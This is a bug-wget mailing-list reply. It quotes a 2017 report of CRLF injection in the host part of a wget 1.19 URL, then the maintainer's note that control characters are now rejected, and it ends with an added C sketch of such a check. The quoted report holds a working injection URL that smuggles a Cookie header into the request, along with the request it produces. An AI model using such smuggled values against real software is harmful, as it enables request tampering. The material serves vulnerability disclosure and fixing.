
Re: [Bug-wget] Vulnerability Report - CRLF Injection in Wget Host Part


From: Tim Ruehsen
Subject: Re: [Bug-wget] Vulnerability Report - CRLF Injection in Wget Host Part
Date: Mon, 06 Mar 2017 10:17:25 +0100
User-agent: KMail/5.2.3 (Linux/4.9.0-2-amd64; KDE/5.28.0; x86_64; ; )

On Monday, March 6, 2017 3:42:24 AM CET Orange Tsai wrote:
> Hi
> 
> I just found that there is a CRLF Injection in the latest version of Wget
> 1.19.
> 
> Wget uses urlencode to encode CRLF in the PATH part but doesn't use it in the
> HOST part. So an attacker can inject an arbitrary header in the request.
> 
> 
> For example:
> 
> # This will fail
> $ wget 'http://127.0.0.1/%0d%0Cookie: hi'
> 
> GET /%0d%0Cookie:%20hi HTTP/1.1
> User-Agent: Wget/1.19 (linux-gnu)
> Accept: */*
> Accept-Encoding: identity
> Host: 127.0.0.1
> Connection: Keep-Alive
> 
> 
> # This will work
> $ wget 'http://127.0.0.1%0d%0aCookie%3a hi%0a/'
> 
> GET / HTTP/1.1
> User-Agent: Wget/1.19 (linux-gnu)
> Accept: */*
> Accept-Encoding: identity
> Host: [127.0.0.1
> *cookie: hi*
> ]
> Connection: Keep-Alive
> 
> 
> Wish you aware this, thanks for your reading :)

Thanks, just pushed a commit, not allowing control chars in host part.

Regards, Tim
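
The reply above describes the fix as not allowing control characters in the host part. The following C sketch is an added example, not part of the original message and not the wget commit (which is not shown on this page); it runs that kind of check on the two URLs from the report. The names `url_host_is_clean` and `hex_val` are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_val(unsigned char c)
{
    if (isdigit(c)) return c - '0';
    c = (unsigned char)tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Hypothetical check (not wget's function): return 1 if the authority
   (host) part of url holds no control character, either raw or
   percent-encoded; return 0 if it does. */
int url_host_is_clean(const char *url)
{
    const char *p = strstr(url, "://");
    p = p ? p + 3 : url;                 /* skip the scheme if present */
    size_t len = strcspn(p, "/?#");      /* authority ends at path/query/fragment */

    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)p[i];
        if (c == '%' && i + 2 < len) {
            int hi = hex_val((unsigned char)p[i + 1]);
            int lo = hex_val((unsigned char)p[i + 2]);
            if (hi >= 0 && lo >= 0) {    /* valid %XX escape: inspect decoded byte */
                c = (unsigned char)(hi * 16 + lo);
                i += 2;
            }
        }
        if (c < 0x20 || c == 0x7f)       /* CR, LF, NUL, DEL, other C0 controls */
            return 0;
    }
    return 1;
}

int main(void)
{
    /* The two URLs from the report above. */
    const char *urls[] = { "http://127.0.0.1/%0d%0Cookie: hi",
                           "http://127.0.0.1%0d%0aCookie%3a hi%0a/" };
    for (size_t i = 0; i < 2; i++)
        printf("%-45s %s\n", urls[i], url_host_is_clean(urls[i]) ? "accept" : "reject");
    return 0;
}
```

The first URL passes because its escapes sit in the path, which the report says wget already encodes; the second is rejected at the `%0d` in the host.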
